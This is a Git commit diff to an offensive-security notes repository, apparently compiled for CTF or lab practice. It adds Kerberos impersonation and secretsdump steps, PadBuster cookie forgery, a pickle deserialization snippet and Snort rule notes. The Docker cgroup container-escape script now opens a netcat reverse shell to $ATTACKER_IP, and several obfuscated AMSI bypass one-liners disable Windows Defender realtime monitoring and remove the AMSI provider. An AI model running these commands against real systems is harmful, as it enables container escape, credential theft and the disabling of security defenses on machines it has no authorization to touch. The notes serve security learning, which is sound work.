whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Friese 2022-03-19 23:39:17 +01:00
parent a3a6f09472
commit fdb8bacf6d
16 changed files with 315 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
.gitmodules vendored
View File

@ -160,3 +160,12 @@
[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"] [submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
[submodule "hashes/exrex"]
path = hashes/exrex
url = https://github.com/asciimoo/exrex.git
[submodule "exploit/padding/PadBuster"]
path = exploit/padding/PadBuster
url = https://github.com/AonCyberLabs/PadBuster.git
[submodule "enumeration/Subrake"]
path = enumeration/Subrake
url = https://github.com/hash3liZer/Subrake.git

1
enumeration/Subrake Submodule

@ -0,0 +1 @@
Subproject commit 08b2a2509c934d5d9c6256c7dbe14ef26f6ddb6c

11
enumeration/docs/dns.md Normal file
View File

@ -0,0 +1,11 @@
# DNS
## Subdomain Enumeration
* Get all the info via
```sh
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
* [subrake](https://github.com/hash3liZer/Subrake.git)

37
enumeration/docs/kerberoast.md
View File

@ -2,12 +2,36 @@
## Usage ## Usage
### List users
```sh
kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
```
### Get Users
* Impacket's `GetNPUsers.py` to get Hashes of userlist * Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh ```sh
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
``` ```
* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py` ### Find SPNs
```sh
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
or
```sh
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
```
### Further Intel
```sh
findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
### Check Found Users
* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
```sh ```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
``` ```
@ -17,4 +41,15 @@ crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
smbpasswd.py <user>@$TARGET_IP -newpass password123 smbpasswd.py <user>@$TARGET_IP -newpass password123
``` ```
### Impersonate
```sh
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
```
* Serviceticket is save as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
* After that dump secrets
```sh
secretsdump.py -k -no-pass <DOMAIN>
```

10
enumeration/docs/ldap.md
View File

@ -3,7 +3,15 @@
## Get Domain ## Get Domain
```sh ```sh
ldapsearch -x -h $TARGET_IP -s base namingcontexts ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
```
* Use found namingcontexts DC
```sh
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>
```
* Authenticated LDAP Search
```sh
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > outfile
``` ```
## Domain Dump ## Domain Dump

11
enumeration/docs/rpcclient.md Normal file
View File

@ -0,0 +1,11 @@
# rpcclient
```sh
rpcclient -U% $TARGET_IP
```
* Input commands, attributes count for the current user on the machine
```sh
enumdomusers
enumdomains
enumprivs
```

6
exploit/binaries/ret2libc.md
View File

@ -31,7 +31,7 @@ readelf -s /lib32/libc.so.6 | grep system
### Measure the Buffer ### Measure the Buffer
* With gef * With gef
* `create pattern` * `pattern create`
* `run` * `run`
* Use pattern * Use pattern
* `pattern search $<register>` * `pattern search $<register>`
@ -53,6 +53,10 @@ ROPgadget --binary <file> | grep rdi
objdump -d <file> | grep ret objdump -d <file> | grep ret
``` ```
## Automated
* [xct's ropstar](https://github.com/xct/ropstar.git)
## Example without ASLR ## Example without ASLR
```python ```python
from pwn import * from pwn import *

15
exploit/linux/dirty_pipe/dirty_pipe.md Normal file
View File

@ -0,0 +1,15 @@
# CVE-2022-0847
* [Max Kellerman's post](https://dirtypipe.cm4all.com/)
* 5.8 < Vulnerable kernels < 5.10.102
* If a file can be read, it can be written also.
## Usage
* `splice(2)` moves data between files and through pipes without copying between kernel and user adress space
* Anonymous pipes permissions are not checked
* Read only permissions on pages do not matter on a pipe level
* Splice is putting data into the pipe and malicious data afterwards in the same one to overwrite the mem page
* `PIPE_BUF_FLAG_CAN_MERGE` flag has to be activated in order to write back to a file
* Works as long as there is an offset to start of a page in the beginning of the writing

1
exploit/padding/PadBuster Submodule

@ -0,0 +1 @@
Subproject commit 50e4a3e2bf5dfff5699440b3ebc61ed1b5c49bbe

16
exploit/padding/padbuster.md Normal file
View File

@ -0,0 +1,16 @@
# PadBuster
* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git)
* Padding Oracle
## Usage on Cookies
* Oracle on cookievalue, use website error message of invalid padding
* A high privileged user account can be added as a target
```sh
./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
```sh
./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
```

5
exploit/python/pickle.md
View File

@ -14,3 +14,8 @@ x = evil_object()
y = pickle.dumps(x) y = pickle.dumps(x)
base64.b64encode(y) base64.b64encode(y)
``` ```
* Dump serialized object via
```python
pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
```

1
hashes/exrex Submodule

@ -0,0 +1 @@
Subproject commit 9a66706e7582a9cf31c4121629c9035e329bbe21

2
hashes/generate_wordlists.md
View File

@ -43,4 +43,6 @@ ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt
ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt
``` ```
# exrex
* Generate all possible outcomes from regex string

4
misc/level3_hypervisor/docker_sec/docker.md
View File

@ -85,14 +85,14 @@ capsh --print
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.) * [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit * Exploit and get a reverse shell to the host via
```sh ```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/tmp/f" >> /exploit
chmod a+x /exploit chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
``` ```

134
misc/snort.md Normal file
View File

@ -0,0 +1,134 @@
# Snort
Comprised of __packet decoder__, __pre processor__, __detection engine__, __logging and alerting__, __output and plugins__
## Data Aquisition Modules
* __Pcap__, default
* __Afpacket__, inline mode, IPS
* __Ipq__, uses netfilter on linux
* __Nfq__, inline mode on linux
* __Ipfw__, inline mode on BSD
* __Dump__, test mode
## Usage
* Check config, and run tests via
```sh
snort -c <config> -T
```
### Sniffing
| Parameter | Description |
+-----------+-------------+
| -v | Verbose. Display the TCP/IP output in the console.|
| -d | Display the packet data (payload).|
| -e | Display the link-layer (TCP/IP/UDP/ICMP) headers. |
| -X | Display the full packet details in HEX.|
| -i | Liste on interface |
### Packet Logger
* Logged by IP as directory, ports as files inside these dirs
* BPF filter can be used like `tcp port 80`
* Log files can be opened by wireshark or tcpdump
| Parameter | Description |
|-----------|-------------|
| -l | Logger mode, target log and alert output directory. Default output folder is tcpdump to /var/log/snort.|
| -K ASCII | Log packets in ASCII format |
| -r | Filter dumped logs in Snort |
| -n | Specify the number of packets that will be read |
### IDS and IPS
* Output is an alert file along an optional log file
| Parameter | Description |
|-----------|-------------|
| -c | Defining the configuration file |
| -T | Testing the configuration file |
| -N | Disable logging |
| -D | Background mode |
| -A | Alert modes; __full__: all possible info about alerts, default mode; __fast__ : alert message, timestamp, source and destination IP, port numbers. __console__: Provides fast style alerts on the console screen. __cmg__: CMG style, basic header details with payload in hex and text format. __none__: Disabling alerting |
* Rules found in `/etc/snort/rules/local.rules`
```sh
alert icmp any any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
```
### PCAPs
* `snort -c <configfile> -r file.pcap -A console -n <number of packets>`
* `snort -c <configfile> --pcap-list="file1.pcap file2.pcap" -A console -l .`
## Rules
```sh
snort -c /etc/snort/rules/local.rules -A console
snort -c /etc/snort/rules/local.rules -A full
```
* Every rule has an IP source and destination, as well as a port for every endpoint
* General, payload and non payload rules
* Direction of the packet
* `->` to destination
* `<>` bidirectional
* IDS -> `alert`
* IPS -> `reject`
`<action> <protocol> <ip.src> <src.port> <> <ip.dst> <dst.port>(msg: "<msg>; <reference>; <ruleID>;<revision info>`
* Actions
* `alert`
* `log`
* `drop`
* `reject`
* SID rule IDs
* < 100 reserved rules
* 100 - 999,999 rules of the build
* >= 1,000,000 user rules
* Reference may be a CVE
* Revisions are versionings of the rule
* Filter address range via CIDR
```sh
alert icmp 192.168.1.0/24 any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
```
* Filter multiple address ranges
```sh
alert icmp [192.168.1.0/24, 10.1.1.0/24] any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
```
* Exlude via `!10.10.0.1`
* Filter via any and ports between 4712 and 8080
```sh
alert icmp any 4711,8080: <> any any (msg: "TCP Packet Found"; sid: 100001; rev:1;)
```
### Detection Rules
* `/etc/snort/rules/local.rules`
* ASCII or gex mode
```sh
ASCII mode - alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; sid: 100001; rev:1;)
alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"|47 45 54|"; sid: 100001; rev:1;)
```
* Case insensitiv
```sh
alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; nocase; sid: 100001; rev:1;)
```
* Fast pattern
```sh
alert tcp any any <> any 80 (msg: "GET Request Found"; content:"GET"; fast_pattern; content:"www"; sid:100001; rev:1;)
```
* Non payload detection rules
* TCP flags, `flags: F,S,A,R,P,U`
* Payload size, `dsize:min<>max`
* SameIP, `alert ip any any <> any any (msg: "SAME-IP TEST"; sameip; sid: 100001; rev:1;)`
* Packet IDs, `id: 4711`

72
post_exploitation/docs/windows/antivirus_evasion.md
View File

@ -35,9 +35,26 @@ Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
``` ```
## Anti Malware Secure Interface ## Anti Malware Secure Interface
* https://docs.microsoft.com/en-us/windows/win32/amsi/
### Return Result Codes * Powershell .NET runtime detection measure of windows. Scans code before executed.
* https://docs.microsoft.com/en-us/windows/win32/amsi/
* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions
* https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream
* Integrated inside components
* User Account Control (UAC)
* Powershell
* Windows Script Host (wscript, csrcipt)
* JavaScript and VBScript
* VBA macros
* `System.Management.Automation.dll`
* Flow
```
| Win32 API | COM API | AV Provider |
Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan()
```
### Return Result/Response Codes
``` ```
AMSI_RESULT_CLEAN = 0 AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1 AMSI_RESULT_NOT_DETECTED = 1
@ -45,27 +62,52 @@ AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768 AMSI_RESULT_DETECTED = 32768
``` ```
### Bypass
* Patching amsi.dll ### PowerShell Downgrade Attack
* Amsi ScanBuffer patch
* Forcing errors * Downgrade Powershell version to 2.0, where no AMSI is implemented
```sh
PowerShell -Version 2
```
* [Unicorn](https://github.com/trustedsec/unicorn) does leverage this
### Reflection Bypass
* Varying string concatenation and camelCasing variations of the following string by Matt Graeber
* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/) * [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
* PowerShell downgrade ```sh
* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git) [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py) ```
* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) or an obfuscated version
* Practical example
```sh ```sh
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableRealtimeMonitoring $true
``` ```
* Varying string concatenation and camelCasing variations of the following string
```sh ### AMSI ScanBuffer patch
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
``` * Patching `amsi.dll`, which is loaded at Powershell startup
* AMSI ScanBuffer is delivered to `amsi.dll`
* Get handle of `amsi.dll`
* Get process address of AmsiScanBuffer
* Modify mem protection of AmsiScanBuffer
* Write opcode to AMSIScanBuffer
* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py)
* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs)
### Other Bypasses and Tools
* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)
* [amsifail](http://amsi.fail/) generates obfuscated snippets
### Validate ### Validate
* [AMSITrigger](https://github.com/RythmStick/AMSITrigger) identifies strings which trigger the AMSI functions
* Validate Obfuscation and check which strings trigger AMSI * Validate Obfuscation and check which strings trigger AMSI
* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger) * [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)
```sh ```sh